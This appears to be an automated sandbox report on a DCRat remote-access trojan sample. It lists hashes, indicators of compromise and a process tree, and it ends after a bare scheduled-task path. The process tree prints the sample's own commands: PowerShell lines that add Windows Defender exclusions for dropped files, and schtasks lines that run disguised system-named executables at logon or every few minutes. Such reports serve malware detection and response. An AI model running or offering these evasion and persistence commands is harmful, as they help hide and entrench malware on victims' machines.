dcrat | 433fa853fae6ee81fa9358c8fe490debe591adeef492ab63dd9518df9ad56750

Analysis

max time kernel
142s
max time network
154s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
31/10/2022, 23:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

433fa853fae6ee81fa9358c8fe490debe591adeef492ab63dd9518df9ad56750.exe
Size

1.3MB
MD5

829bba2d2c08dc1c0d9d67c582b914c7
SHA1

cf1c18db80c89818aa6d4d815ef27c7791f21010
SHA256

433fa853fae6ee81fa9358c8fe490debe591adeef492ab63dd9518df9ad56750
SHA512

b8d0cd0ebb3cd09a8f6bfeb77e7edf3d129b420e1975b61a8014701ff2a336f16d6ed1779a5c7631b1ee33309e17f7b75c0eac981c8beb9dc0f00bace623983c
SSDEEP

24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Score

10^/10

dcrat infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 54 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3188	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4660	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3496	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4876	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1004	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3724	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4228	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4036	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3704	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4892	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3688	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3240	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3280	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2768	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4812	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4904	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4728	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4916	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4752	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4776	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4456	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	652	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	484	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	432	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	552	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1708	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1224	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1180	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1604	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1532	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	60	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	972	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1016	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1908	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1820	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3332	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	32	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	316	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	192	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	772	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3168	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2424	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2284	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2260	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2248	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	864	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	816	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2012	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2412	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2752	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2624	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2120	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2572	4692	schtasks.exe	70
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2336	4692	schtasks.exe	70

DCRat payload 5 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x000600000001ac1f-279.dat	dcrat
behavioral1/files/0x000600000001ac1f-280.dat	dcrat
behavioral1/memory/4192-281-0x0000000000A90000-0x0000000000BA0000-memory.dmp	dcrat
behavioral1/files/0x000600000001ac3c-364.dat	dcrat
behavioral1/files/0x000600000001ac3c-363.dat	dcrat

Executes dropped EXE 2 IoCs

pid	Process
4192	DllCommonsvc.exe
1252	SearchUI.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in Program Files directory 14 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Windows Photo Viewer\de-DE\cc11b995f2a76d	DllCommonsvc.exe
File created	C:\Program Files (x86)\Microsoft.NET\RedistList\c5b4cb5e9653cc	DllCommonsvc.exe
File created	C:\Program Files\Windows Security\5b884080fd4f94	DllCommonsvc.exe
File created	C:\Program Files\Google\Chrome\e6c9b481da804f	DllCommonsvc.exe
File created	C:\Program Files (x86)\Microsoft.NET\RedistList\services.exe	DllCommonsvc.exe
File created	C:\Program Files\7-Zip\Lang\dllhost.exe	DllCommonsvc.exe
File created	C:\Program Files\Internet Explorer\en-US\9e8d7a4ca61bd9	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Multimedia Platform\886983d96e3d3e	DllCommonsvc.exe
File created	C:\Program Files\Google\Chrome\OfficeClickToRun.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\de-DE\winlogon.exe	DllCommonsvc.exe
File created	C:\Program Files\7-Zip\Lang\5940a34987c991	DllCommonsvc.exe
File created	C:\Program Files\Internet Explorer\en-US\RuntimeBroker.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Multimedia Platform\csrss.exe	DllCommonsvc.exe
File created	C:\Program Files\Windows Security\fontdrvhost.exe	DllCommonsvc.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	C:\Windows\INF\.NET CLR Data\6203df4a6bafc7	DllCommonsvc.exe
File created	C:\Windows\TAPI\csrss.exe	DllCommonsvc.exe
File created	C:\Windows\TAPI\886983d96e3d3e	DllCommonsvc.exe
File created	C:\Windows\Globalization\dwm.exe	DllCommonsvc.exe
File created	C:\Windows\Globalization\6cb0b6c459d5d3	DllCommonsvc.exe
File created	C:\Windows\INF\.NET CLR Data\lsass.exe	DllCommonsvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 54 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4036	schtasks.exe
3168	schtasks.exe
2260	schtasks.exe
3724	schtasks.exe
3240	schtasks.exe
1016	schtasks.exe
1908	schtasks.exe
316	schtasks.exe
816	schtasks.exe
2012	schtasks.exe
2624	schtasks.exe
652	schtasks.exe
552	schtasks.exe
60	schtasks.exe
772	schtasks.exe
2336	schtasks.exe
3496	schtasks.exe
4228	schtasks.exe
2768	schtasks.exe
3704	schtasks.exe
2752	schtasks.exe
2120	schtasks.exe
1004	schtasks.exe
3688	schtasks.exe
4812	schtasks.exe
4776	schtasks.exe
1224	schtasks.exe
1820	schtasks.exe
4876	schtasks.exe
972	schtasks.exe
32	schtasks.exe
2424	schtasks.exe
432	schtasks.exe
3332	schtasks.exe
4660	schtasks.exe
1532	schtasks.exe
192	schtasks.exe
2412	schtasks.exe
3280	schtasks.exe
4916	schtasks.exe
4752	schtasks.exe
1708	schtasks.exe
864	schtasks.exe
4904	schtasks.exe
484	schtasks.exe
1604	schtasks.exe
2284	schtasks.exe
3188	schtasks.exe
4892	schtasks.exe
4728	schtasks.exe
1180	schtasks.exe
2248	schtasks.exe
4456	schtasks.exe
2572	schtasks.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings	433fa853fae6ee81fa9358c8fe490debe591adeef492ab63dd9518df9ad56750.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4192	DllCommonsvc.exe
4192	DllCommonsvc.exe
4192	DllCommonsvc.exe
4192	DllCommonsvc.exe
4192	DllCommonsvc.exe
4192	DllCommonsvc.exe
4192	DllCommonsvc.exe
4192	DllCommonsvc.exe
4192	DllCommonsvc.exe
3948	powershell.exe
3948	powershell.exe
3872	powershell.exe
3872	powershell.exe
4940	powershell.exe
4940	powershell.exe
2668	powershell.exe
2668	powershell.exe
4964	powershell.exe
4964	powershell.exe
4992	powershell.exe
4992	powershell.exe
2064	powershell.exe
2064	powershell.exe
4796	powershell.exe
4796	powershell.exe
3880	powershell.exe
3880	powershell.exe
5072	powershell.exe
5072	powershell.exe
4472	powershell.exe
4472	powershell.exe
3580	powershell.exe
3580	powershell.exe
2212	powershell.exe
2212	powershell.exe
3792	powershell.exe
3792	powershell.exe
4612	powershell.exe
4612	powershell.exe
4520	powershell.exe
4520	powershell.exe
4672	powershell.exe
4672	powershell.exe
4796	powershell.exe
3580	powershell.exe
4252	powershell.exe
4252	powershell.exe
5108	powershell.exe
5108	powershell.exe
2212	powershell.exe
4612	powershell.exe
1252	SearchUI.exe
1252	SearchUI.exe
4520	powershell.exe
3948	powershell.exe
4940	powershell.exe
3872	powershell.exe
3880	powershell.exe
3580	powershell.exe
4796	powershell.exe
4964	powershell.exe
2064	powershell.exe
2668	powershell.exe
4992	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1252	SearchUI.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4192	DllCommonsvc.exe
Token: SeDebugPrivilege	3948	powershell.exe
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeDebugPrivilege	4940	powershell.exe
Token: SeDebugPrivilege	2668	powershell.exe
Token: SeDebugPrivilege	4964	powershell.exe
Token: SeDebugPrivilege	4992	powershell.exe
Token: SeDebugPrivilege	2064	powershell.exe
Token: SeDebugPrivilege	4796	powershell.exe
Token: SeDebugPrivilege	3880	powershell.exe
Token: SeDebugPrivilege	5072	powershell.exe
Token: SeDebugPrivilege	4472	powershell.exe
Token: SeDebugPrivilege	3580	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	1252	SearchUI.exe
Token: SeDebugPrivilege	3792	powershell.exe
Token: SeDebugPrivilege	4612	powershell.exe
Token: SeDebugPrivilege	4520	powershell.exe
Token: SeDebugPrivilege	4672	powershell.exe
Token: SeDebugPrivilege	4252	powershell.exe
Token: SeDebugPrivilege	5108	powershell.exe
Token: SeIncreaseQuotaPrivilege	3580	powershell.exe
Token: SeSecurityPrivilege	3580	powershell.exe
Token: SeTakeOwnershipPrivilege	3580	powershell.exe
Token: SeLoadDriverPrivilege	3580	powershell.exe
Token: SeSystemProfilePrivilege	3580	powershell.exe
Token: SeSystemtimePrivilege	3580	powershell.exe
Token: SeProfSingleProcessPrivilege	3580	powershell.exe
Token: SeIncBasePriorityPrivilege	3580	powershell.exe
Token: SeCreatePagefilePrivilege	3580	powershell.exe
Token: SeBackupPrivilege	3580	powershell.exe
Token: SeRestorePrivilege	3580	powershell.exe
Token: SeShutdownPrivilege	3580	powershell.exe
Token: SeDebugPrivilege	3580	powershell.exe
Token: SeSystemEnvironmentPrivilege	3580	powershell.exe
Token: SeRemoteShutdownPrivilege	3580	powershell.exe
Token: SeUndockPrivilege	3580	powershell.exe
Token: SeManageVolumePrivilege	3580	powershell.exe
Token: 33	3580	powershell.exe
Token: 34	3580	powershell.exe
Token: 35	3580	powershell.exe
Token: 36	3580	powershell.exe
Token: SeIncreaseQuotaPrivilege	4612	powershell.exe
Token: SeSecurityPrivilege	4612	powershell.exe
Token: SeTakeOwnershipPrivilege	4612	powershell.exe
Token: SeLoadDriverPrivilege	4612	powershell.exe
Token: SeSystemProfilePrivilege	4612	powershell.exe
Token: SeSystemtimePrivilege	4612	powershell.exe
Token: SeProfSingleProcessPrivilege	4612	powershell.exe
Token: SeIncBasePriorityPrivilege	4612	powershell.exe
Token: SeCreatePagefilePrivilege	4612	powershell.exe
Token: SeBackupPrivilege	4612	powershell.exe
Token: SeRestorePrivilege	4612	powershell.exe
Token: SeShutdownPrivilege	4612	powershell.exe
Token: SeDebugPrivilege	4612	powershell.exe
Token: SeSystemEnvironmentPrivilege	4612	powershell.exe
Token: SeRemoteShutdownPrivilege	4612	powershell.exe
Token: SeUndockPrivilege	4612	powershell.exe
Token: SeManageVolumePrivilege	4612	powershell.exe
Token: 33	4612	powershell.exe
Token: 34	4612	powershell.exe
Token: 35	4612	powershell.exe
Token: 36	4612	powershell.exe
Token: SeIncreaseQuotaPrivilege	4796	powershell.exe

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 2684 wrote to memory of 5108	2684	433fa853fae6ee81fa9358c8fe490debe591adeef492ab63dd9518df9ad56750.exe	66
PID 2684 wrote to memory of 5108	2684	433fa853fae6ee81fa9358c8fe490debe591adeef492ab63dd9518df9ad56750.exe	66
PID 2684 wrote to memory of 5108	2684	433fa853fae6ee81fa9358c8fe490debe591adeef492ab63dd9518df9ad56750.exe	66
PID 5108 wrote to memory of 4112	5108	WScript.exe	67
PID 5108 wrote to memory of 4112	5108	WScript.exe	67
PID 5108 wrote to memory of 4112	5108	WScript.exe	67
PID 4112 wrote to memory of 4192	4112	cmd.exe	69
PID 4112 wrote to memory of 4192	4112	cmd.exe	69
PID 4192 wrote to memory of 3872	4192	DllCommonsvc.exe	125
PID 4192 wrote to memory of 3872	4192	DllCommonsvc.exe	125
PID 4192 wrote to memory of 3948	4192	DllCommonsvc.exe	142
PID 4192 wrote to memory of 3948	4192	DllCommonsvc.exe	142
PID 4192 wrote to memory of 4940	4192	DllCommonsvc.exe	139
PID 4192 wrote to memory of 4940	4192	DllCommonsvc.exe	139
PID 4192 wrote to memory of 2668	4192	DllCommonsvc.exe	138
PID 4192 wrote to memory of 2668	4192	DllCommonsvc.exe	138
PID 4192 wrote to memory of 4964	4192	DllCommonsvc.exe	129
PID 4192 wrote to memory of 4964	4192	DllCommonsvc.exe	129
PID 4192 wrote to memory of 4992	4192	DllCommonsvc.exe	130
PID 4192 wrote to memory of 4992	4192	DllCommonsvc.exe	130
PID 4192 wrote to memory of 4796	4192	DllCommonsvc.exe	131
PID 4192 wrote to memory of 4796	4192	DllCommonsvc.exe	131
PID 4192 wrote to memory of 2064	4192	DllCommonsvc.exe	132
PID 4192 wrote to memory of 2064	4192	DllCommonsvc.exe	132
PID 4192 wrote to memory of 3880	4192	DllCommonsvc.exe	136
PID 4192 wrote to memory of 3880	4192	DllCommonsvc.exe	136
PID 4192 wrote to memory of 5072	4192	DllCommonsvc.exe	140
PID 4192 wrote to memory of 5072	4192	DllCommonsvc.exe	140
PID 4192 wrote to memory of 4472	4192	DllCommonsvc.exe	163
PID 4192 wrote to memory of 4472	4192	DllCommonsvc.exe	163
PID 4192 wrote to memory of 3580	4192	DllCommonsvc.exe	161
PID 4192 wrote to memory of 3580	4192	DllCommonsvc.exe	161
PID 4192 wrote to memory of 2212	4192	DllCommonsvc.exe	144
PID 4192 wrote to memory of 2212	4192	DllCommonsvc.exe	144
PID 4192 wrote to memory of 3792	4192	DllCommonsvc.exe	145
PID 4192 wrote to memory of 3792	4192	DllCommonsvc.exe	145
PID 4192 wrote to memory of 4612	4192	DllCommonsvc.exe	146
PID 4192 wrote to memory of 4612	4192	DllCommonsvc.exe	146
PID 4192 wrote to memory of 4520	4192	DllCommonsvc.exe	147
PID 4192 wrote to memory of 4520	4192	DllCommonsvc.exe	147
PID 4192 wrote to memory of 4672	4192	DllCommonsvc.exe	156
PID 4192 wrote to memory of 4672	4192	DllCommonsvc.exe	156
PID 4192 wrote to memory of 5108	4192	DllCommonsvc.exe	149
PID 4192 wrote to memory of 5108	4192	DllCommonsvc.exe	149
PID 4192 wrote to memory of 4252	4192	DllCommonsvc.exe	153
PID 4192 wrote to memory of 4252	4192	DllCommonsvc.exe	153
PID 4192 wrote to memory of 1252	4192	DllCommonsvc.exe	152
PID 4192 wrote to memory of 1252	4192	DllCommonsvc.exe	152

C:\Users\Admin\AppData\Local\Temp\433fa853fae6ee81fa9358c8fe490debe591adeef492ab63dd9518df9ad56750.exe
"C:\Users\Admin\AppData\Local\Temp\433fa853fae6ee81fa9358c8fe490debe591adeef492ab63dd9518df9ad56750.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2684
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4112
  - - C:\providercommon\DllCommonsvc.exe
      "C:\providercommon\DllCommonsvc.exe"
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4192
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3872
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\de-DE\winlogon.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4964
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Application Data\fontdrvhost.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4992
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\RedistList\services.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4796
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Globalization\dwm.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2064
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\dllhost.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3880
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Google\Chrome\OfficeClickToRun.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2668
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\csrss.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4940
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\SearchUI.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5072
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\services.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3948
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dllhost.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2212
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Multimedia Platform\csrss.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3792
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Links\sppsvc.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4612
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Favorites\taskhostw.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4520
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\spoolsv.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5108
    - - C:\Users\Default User\SearchUI.exe
        
        "C:\Users\Default User\SearchUI.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:1252
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\fontdrvhost.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4252
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\fontdrvhost.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4672
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\en-US\RuntimeBroker.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3580
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\INF\.NET CLR Data\lsass.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4472

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3496

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Windows\TAPI\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4876

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\TAPI\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Windows\TAPI\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3724

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 14 /tr "'C:\Program Files\Google\Chrome\OfficeClickToRun.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\Program Files\Google\Chrome\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3704

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4892

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3688

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Photo Viewer\de-DE\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3240

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\Application Data\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3280

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Admin\Application Data\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2768

C:\Windows\system32\schtasks.exe
